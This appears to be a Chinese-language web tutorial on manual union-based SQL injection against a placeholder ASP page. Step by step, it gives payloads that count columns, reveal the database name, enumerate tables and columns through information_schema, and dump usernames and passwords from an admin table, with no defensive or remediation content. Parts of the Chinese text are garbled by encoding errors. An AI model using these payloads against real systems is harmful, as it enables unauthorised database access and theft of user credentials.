您好,登錄后才能下訂單哦!
例如有一個網(wǎng)站:www.xxxxx.com/artist.asp?id=2
id=2 order by 3 正常
id=2 order by 4 不正常
order by需要獲取字段的總數(shù)為3
id=2 union select 1,2,3
id=2 union select 1,2,database() #爆數(shù)據(jù)庫名
id=2 union select 1,2,database()
有一些數(shù)據(jù),union聯(lián)合查詢后,不會多行顯示,就需要先讓前面的語句失效
id=-2 union select 1,2,database()
id=-2 union select 1,TABLE_NAME,3 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' #已知數(shù)據(jù)庫sqlzhuru,爆表名(第一個表)
因id = -2不存在,帶入select * from admin where id=-2報錯哦
當(dāng)然你也可以用下面的這個語句,效果等同于“id=-2”
id=2 and 1=2 union select 1,TABLE_NAME,3 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' #已知數(shù)據(jù)庫sqlzhuru,爆表名(第一個表)
id=2 and 1=2 union select 1,TABLE_NAME,3 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' limit 0,1 #已知數(shù)據(jù)庫sqlzhuru,爆表名(第一個表)
id=2 and 1=2 union select 1,TABLE_NAME,3 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' limit 1,1 #已知數(shù)據(jù)庫sqlzhuru,爆第二個表
假如得到admin表,繼續(xù)如下:
id=2 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='admin' limit 1,1 #已知admin表,爆二個列名
id=2 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='admin' limit 2,1 #已知admin表,爆三個列名
id=2 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x61646d696e limit 2,1 #已知admin表,爆三個列名(十六進(jìn)制表示admin表)
假如上面得到admin表下的username、password列,接下來就可以列出某某的數(shù)據(jù)了id=2 and 1=2 union select 1,username,password from admin
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。